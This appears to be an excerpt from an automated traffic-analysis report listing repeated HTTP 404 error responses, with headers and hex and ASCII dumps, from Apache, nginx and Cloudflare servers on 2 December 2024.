                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:25:29 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:25:32 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:25:37 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:25:44 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:25:47 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:25:52 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9b06-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:26:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:26:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:26:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:26:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:26:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q999qeSC8rjum2VgqBSdrdB5hrZyxQ9k3wIitk0%2Bq%2BUmuicI%2FGUNZtzB%2ByyALXbC%2BlFu97B3Cmc62QK5iyb6PSzYefJbmUUpBE9ElfS4bJ5vZ6bMzPbhrA0Xg2DFjoBwq1JEuzAR%2Fj8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbfe719a1919b6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:26:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SafWd9HfBOJymYdjoJB712v%2Fy6PkvH8BrDlPy9nQ1Cl%2BnX28Tamxy4nEadM3QzsA8TVLUwG6WD1vrpVcEbjlu%2FuN7ud6VHj10Az9jLyhtZPoQRrhnzG%2Fk%2FWqG0hT2UkL10uPJKY2b44%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbfe8279eff5f7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:26:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLqNiMYY1ux9mYEQfcHVl7N%2FI4UrRyMKGZ5llvJ9iBA6ZCO%2Bqe3t%2BfOb76vYEfFkDW3yK3ClLINxBWm4UFkZAabfNKsJ7q%2FkWlKL5IyiO1ODG2REysVk%2FQzJPfwsaRqWn8yXEM7M1Ks%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbfe931d1e42e8-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1811&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:26:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEc2f3RJZfHySdKuuKhrzrNmxVGOIJAoIJyqvgP%2Bmxeylgr%2BltjfD%2BMdg5J7HcRCQaW5EwPAMf34fJLufWrUzS5PUU1pZg6tnFDhp%2BjiwQ0kvtj6eSHQQkhv3%2FDLTrcJED5LFQDk%2F7g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbfea3fa417d24-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 